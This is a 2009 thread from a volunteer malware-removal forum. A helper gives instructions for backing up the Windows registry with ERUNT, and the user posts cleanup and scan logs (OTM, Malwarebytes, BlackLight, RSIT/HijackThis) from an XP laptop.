Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

HJT LOG (IE - Internet Explorer cannot display the webpage)

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 4th, 2009, 8:55 am

Hi :)

Thanks for your help.
You're welcome!

I do not have ERUNT on my system. Please let me know how to proceed.
Not a problem and actually you took the correct course of action with informing myself and please except my apology about the mistake concerning ERUNT.

OK follow these instructions for ERUNT and then proceed to my prior for running OTM onwards, thank you.

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it always wise to create a backup before doing so.

  • Please go here and download ERUNT.
  • ERUNT (Emergency Recovery Utility NT) is a free program that allows you to keep a complete backup of your registry and restore it when needed.
  • Install ERUNT by following the prompts.
  • Use the default install settings but say no to the portion that asks you to add ERUNT to the Start-Up folder. You can enable this option later if you wish.
  • Start ERUNT either by double clicking on the desktop icon or choosing to start the program at the end of the setup process.
  • Choose a location for the backup. Note: the default location is C:\WINDOWS\ERDNT which is acceptable.
  • Make sure that at least the first two check boxes are selected.
  • Click on OK
  • Then click on YES to create the folder.

Note: if it is necessary to restore the registry, open the backup folder and start ERDNT.exe
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra
Advertisement
Register to Remove

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 4th, 2009, 1:31 pm

Hey,

My browser seems to work fine as of now.. however since the problem is intermittent I will keep an eye out for the same problem again and will let you know. Thanks again for your valuable time and effort.

Below are the details you requested for.

OTM Log

All processes killed
========== PROCESSES ==========
No active process named Explorer.EXE was found!
========== REGISTRY ==========
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\"Start Page"|"http://www.msn.com" /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ deleted successfully.
Registry key HKEY_CLASSES_ROOT\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AF69DE43-7D58-4638-B6FA-CE66B5AD205D}\ not found.
========== FILES ==========
C:\Velocity Media\Website v2\about.html moved successfully.
C:\Velocity Media\Website v2\bottom.html moved successfully.
C:\Velocity Media\Website v2\contact.html moved successfully.
C:\Velocity Media\Website v2\corpevents.html moved successfully.
C:\Velocity Media\Website v2\creative.html moved successfully.
C:\Velocity Media\Website v2\events.html moved successfully.
C:\Velocity Media\Website v2\gallery.html moved successfully.
C:\Velocity Media\Website v2\gallery2.html moved successfully.
C:\Velocity Media\Website v2\marcom.html moved successfully.
C:\Velocity Media\Website v2\marketing.html moved successfully.
C:\Velocity Media\Website v2\menu.html moved successfully.
C:\Velocity Media\Website v2\menu.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_dom.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_ie.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_iemac.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_opera.js moved successfully.
C:\Velocity Media\Website v2\pbrowser_safari.js moved successfully.
C:\Velocity Media\Website v2\portfolio.html moved successfully.
C:\Velocity Media\Website v2\pr.html moved successfully.
C:\Velocity Media\Website v2\services.html moved successfully.
C:\Velocity Media\Website v2\swfobject.js moved successfully.
C:\Velocity Media\Website v2\thankyou.html moved successfully.
C:\Velocity Media\Website v2\top.html moved successfully.
C:\Velocity Media\Website v2\validation1.js moved successfully.
C:\Velocity Media\Website v2\vmenu1.js moved successfully.
C:\Velocity Media\Website v2\_holding.htm moved successfully.
C:\Velocity Media\Website v3\archive\gallery.html moved successfully.
C:\Velocity Media\Website v3\archive\swfobject.js moved successfully.
C:\Velocity Media\Website v3\archive\validation1.js moved successfully.
C:\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe moved successfully.
C:\WINDOWS\tasks\User_Feed_Synchronization-{AC22173D-1CEC-4997-A460-1D4979E3C285}.job moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: admin

User: Administrator
->Temp folder emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes

User: Guest
->Temporary Internet Files folder emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes

User: me
->Temp folder emptied: 78372234 bytes
->Temporary Internet Files folder emptied: 43739140 bytes
->Java cache emptied: 13981126 bytes
->FireFox cache emptied: 45941749 bytes
->Google Chrome cache emptied: 276268362 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 16786 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 5182481 bytes
Windows Temp folder emptied: 1360929 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 443.33 mb


OTM by OldTimer - Version 3.0.0.5 log created on 08042009_191310

Files moved on Reboot...

Registry entries deleted on Reboot...



Malwarebytes Log

Malwarebytes' Anti-Malware 1.40
Database version: 2551
Windows 5.1.2600 Service Pack 3

8/4/2009 7:34:12 PM
mbam-log-2009-08-04 (19-34-12).txt

Scan type: Quick Scan
Objects scanned: 109076
Time elapsed: 8 minute(s), 6 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



BackLight Log

08/04/09 19:37:04 [Info]: BlackLight Engine 2.2.1092 initialized
08/04/09 19:37:04 [Info]: OS: 5.1 build 2600 (Service Pack 3)
08/04/09 19:37:04 [Note]: 7019 4
08/04/09 19:37:04 [Note]: 7005 0
08/04/09 19:37:07 [Note]: 7006 0
08/04/09 19:37:07 [Note]: 7022 0
08/04/09 19:37:07 [Note]: 7011 2112
08/04/09 19:37:07 [Note]: 7035 0
08/04/09 19:37:07 [Note]: 7026 0
08/04/09 19:37:07 [Note]: 7026 0
08/04/09 19:37:07 [Note]: FSRAW library version 1.7.1024
08/04/09 22:49:26 [Note]: 7007 0



RSIT Log

Logfile of random's system information tool 1.06 (written by random/random)
Run by me at 2009-08-04 22:49:48
Microsoft Windows XP Home Edition Service Pack 3
System drive C: has 12 GB (18%) free of 66 GB
Total RAM: 1526 MB (41% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:50:35 PM, on 8/4/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe
C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\Program Files\Common Files\Teleca Shared\Generic.exe
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SYMBIA~1.EXE
C:\PROGRA~1\Symbian\Shared\SYMBIA~1\SCBAL.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Java\jre6\bin\java.exe
C:\WINDOWS\notepad.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Documents and Settings\me\Desktop\RSIT.exe
C:\Program Files\Trend Micro\HijackThis\me.exe
C:\Documents and Settings\me\Local Settings\Application Data\Google\Chrome\Application\chrome.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://ie.redirect.hp.com/svs/rdr?TYPE= ... &pf=laptop
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [PC Suite for Smartphones] "C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe" /startoptions
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [mRouterConfig] "C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe"
O4 - Global Startup: Bluetooth.lnk = ?
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/v ... .2.4.8.cab
O16 - DPF: {49232000-16E4-426C-A231-62846947304B} (SysData Class) - https://wimpro.cce.hp.com/ChatEntry/dow ... ysinfo.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 4784755890
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b56907.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O16 - DPF: {F9043C85-F6F2-101A-A3C9-08002B2F49FB} (Microsoft Common Dialog Control, version 6.0 (SP6)) - file:///C:/Program%20Files/OpenCube/NavStudio/program/comdlg32.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GR99D3~1.DLL
O18 - Filter: x-sdch - {B1759355-3EEC-4C1E-B0F1-B719FE26E377} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Symantec Management Client (SmcService) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe
O23 - Service: Symantec Endpoint Protection (Symantec AntiVirus) - Symantec Corporation - C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe

--
End of file - 10191 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006Core.job
C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-721153600-2154975418-3561496284-1006UA.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2009-02-27 61816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3049C3E9-B461-4BC5-8870-4C09146192CA}]
RealPlayer Download and Record Plugin for Internet Explorer - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll [2008-12-25 304736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
Google Toolbar Helper - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE7CD045-E861-484f-8273-0445EE161910}]
AcroIEToolbarHelper Class - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C84D72FE-E17D-4195-BB24-76C02E2E7C4E}]
Google Dictionary Compression sdch - C:\Program Files\Google\Google Toolbar\Component\fastsearch_A8904FB862BD9564.dll [2009-06-05 470512]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-08-04 41368]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-08-04 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - Adobe PDF - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll [2003-05-15 147456]
Locked
{2318C2B1-4965-11d4-9B18-009027A5CD4F} - Google Toolbar - C:\Program Files\Google\Google Toolbar\GoogleToolbar.dll [2009-06-05 259696]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"hpWirelessAssistant"=C:\Program Files\hpq\HP Wireless Assistant\HP Wireless Assistant.exe [2006-05-04 458752]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2006-06-17 794713]
"HP Software Update"=C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [2005-02-16 49152]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2006-06-19 163840]
"googletalk"=C:\Program Files\Google\Google Talk\googletalk.exe [2007-01-02 3739648]
"ccApp"=C:\Program Files\Common Files\Symantec Shared\ccApp.exe [2009-03-17 115560]
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2009-05-26 413696]
"TkBellExe"=C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2008-12-25 185872]
"PC Suite for Smartphones"=C:\Program Files\Sony Ericsson\Mobile4\Application Launcher\Application Launcher.exe [2007-05-28 528384]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-08-04 148888]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Malwarebytes' Anti-Malware"=C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [2009-08-03 419088]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"swg"=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [2008-11-20 68856]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"mRouterConfig"=C:\Program Files\Intuwave\Shared\mRouterRuntime\mRouterConfig.exe [2006-03-02 290816]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Bluetooth.lnk - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\WINDOWS\system32\igfxdev.dll [2006-03-23 139264]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~4\Office12\GRA8E1~1.DLL [2006-10-27 2210608]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccEvtMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\ccSetMgr]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SmcService]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Symantec Antivirus]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=149
"NoDriveAutoRun"=0
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
"C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe"="C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe:*:Enabled:SMC Service"
"C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE"="C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE:*:Enabled:SNAC Service"
"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"="C:\Program Files\Common Files\Symantec Shared\ccApp.exe:*:Enabled:Symantec Email"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe"="C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
